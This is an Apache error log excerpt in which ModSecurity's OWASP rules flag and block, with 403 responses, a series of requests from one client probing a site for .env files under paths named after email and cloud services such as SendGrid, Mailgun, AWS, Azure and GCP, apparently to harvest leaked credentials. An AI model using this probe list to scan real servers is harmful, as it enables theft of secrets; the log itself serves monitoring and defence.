[Mon May 11 17:36:26.887676 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ses/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/ses/.env"] [unique_id "agH3elV4kyjgo4bQBUhuogAAANM"]
[Mon May 11 17:36:26.887858 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/ses/.env"] [unique_id "agH3elV4kyjgo4bQBUhuogAAANM"]
[Mon May 11 17:36:26.888094 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/ses/.env"] [unique_id "agH3elV4kyjgo4bQBUhuogAAANM"]
[Mon May 11 17:36:27.127962 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sendgrid/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/sendgrid/.env"] [unique_id "agH3e1V4kyjgo4bQBUhuowAAANM"]
[Mon May 11 17:36:27.128196 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/sendgrid/.env"] [unique_id "agH3e1V4kyjgo4bQBUhuowAAANM"]
[Mon May 11 17:36:27.128448 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/sendgrid/.env"] [unique_id "agH3e1V4kyjgo4bQBUhuowAAANM"]
[Mon May 11 17:36:27.370840 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sparkpost/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/sparkpost/.env"] [unique_id "agH3e1V4kyjgo4bQBUhupQAAANM"]
[Mon May 11 17:36:27.371186 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/sparkpost/.env"] [unique_id "agH3e1V4kyjgo4bQBUhupQAAANM"]
[Mon May 11 17:36:27.371609 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/sparkpost/.env"] [unique_id "agH3e1V4kyjgo4bQBUhupQAAANM"]
[Mon May 11 17:36:27.624456 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postmark/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/postmark/.env"] [unique_id "agH3e1V4kyjgo4bQBUhupwAAANM"]
[Mon May 11 17:36:27.624688 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/postmark/.env"] [unique_id "agH3e1V4kyjgo4bQBUhupwAAANM"]
[Mon May 11 17:36:27.624973 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/postmark/.env"] [unique_id "agH3e1V4kyjgo4bQBUhupwAAANM"]
[Mon May 11 17:36:27.702889 2026] [ssl:error] [pid 1411201:tid 1411266] (EAI 2)Name or service not known: [client 168.158.205.35:38295] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:36:27.702936 2026] [ssl:error] [pid 1411201:tid 1411266] AH01941: stapling_renew_response: responder error
[Mon May 11 17:36:27.899424 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailgun/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mailgun/.env"] [unique_id "agH3e1V4kyjgo4bQBUhuqQAAANM"]
[Mon May 11 17:36:27.899658 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mailgun/.env"] [unique_id "agH3e1V4kyjgo4bQBUhuqQAAANM"]
[Mon May 11 17:36:27.899919 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mailgun/.env"] [unique_id "agH3e1V4kyjgo4bQBUhuqQAAANM"]
[Mon May 11 17:36:28.091395 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mandrill/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mandrill/.env"] [unique_id "agH3fFV4kyjgo4bQBUhuqgAAANM"]
[Mon May 11 17:36:28.091617 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mandrill/.env"] [unique_id "agH3fFV4kyjgo4bQBUhuqgAAANM"]
[Mon May 11 17:36:28.091883 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mandrill/.env"] [unique_id "agH3fFV4kyjgo4bQBUhuqgAAANM"]
[Mon May 11 17:36:28.276295 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailjet/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mailjet/.env"] [unique_id "agH3fFV4kyjgo4bQBUhurAAAANM"]
[Mon May 11 17:36:28.276519 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mailjet/.env"] [unique_id "agH3fFV4kyjgo4bQBUhurAAAANM"]
[Mon May 11 17:36:28.276782 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mailjet/.env"] [unique_id "agH3fFV4kyjgo4bQBUhurAAAANM"]
[Mon May 11 17:36:28.467196 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /brevo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/brevo/.env"] [unique_id "agH3fFV4kyjgo4bQBUhurQAAANM"]
[Mon May 11 17:36:28.467418 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/brevo/.env"] [unique_id "agH3fFV4kyjgo4bQBUhurQAAANM"]
[Mon May 11 17:36:28.467655 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/brevo/.env"] [unique_id "agH3fFV4kyjgo4bQBUhurQAAANM"]
[Mon May 11 17:36:28.943258 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /transactional/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/transactional/.env"] [unique_id "agH3fFV4kyjgo4bQBUhurgAAANM"]
[Mon May 11 17:36:28.943487 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/transactional/.env"] [unique_id "agH3fFV4kyjgo4bQBUhurgAAANM"]
[Mon May 11 17:36:28.943767 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/transactional/.env"] [unique_id "agH3fFV4kyjgo4bQBUhurgAAANM"]
[Mon May 11 17:36:29.163423 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bulk/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/bulk/.env"] [unique_id "agH3fVV4kyjgo4bQBUhurwAAANM"]
[Mon May 11 17:36:29.163648 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/bulk/.env"] [unique_id "agH3fVV4kyjgo4bQBUhurwAAANM"]
[Mon May 11 17:36:29.163908 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/bulk/.env"] [unique_id "agH3fVV4kyjgo4bQBUhurwAAANM"]
[Mon May 11 17:36:29.497123 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /aws/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/aws/.env"] [unique_id "agH3fVV4kyjgo4bQBUhusgAAANM"]
[Mon May 11 17:36:29.497450 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/aws/.env"] [unique_id "agH3fVV4kyjgo4bQBUhusgAAANM"]
[Mon May 11 17:36:29.497769 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/aws/.env"] [unique_id "agH3fVV4kyjgo4bQBUhusgAAANM"]
[Mon May 11 17:36:29.709553 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/azure/.env"] [unique_id "agH3fVV4kyjgo4bQBUhuswAAANM"]
[Mon May 11 17:36:29.709780 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/azure/.env"] [unique_id "agH3fVV4kyjgo4bQBUhuswAAANM"]
[Mon May 11 17:36:29.710078 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/azure/.env"] [unique_id "agH3fVV4kyjgo4bQBUhuswAAANM"]
[Mon May 11 17:36:29.915840 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/gcp/.env"] [unique_id "agH3fVV4kyjgo4bQBUhutAAAANM"]
[Mon May 11 17:36:29.916024 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/gcp/.env"] [unique_id "agH3fVV4kyjgo4bQBUhutAAAANM"]
[Mon May 11 17:36:29.916307 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/gcp/.env"] [unique_id "agH3fVV4kyjgo4bQBUhutAAAANM"]
[Mon May 11 17:36:29.947627 2026] [ssl:error] [pid 1424905:tid 1424927] (EAI 2)Name or service not known: [client 188.52.209.121:7919] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:36:29.947670 2026] [ssl:error] [pid 1424905:tid 1424927] AH01941: stapling_renew_response: responder error
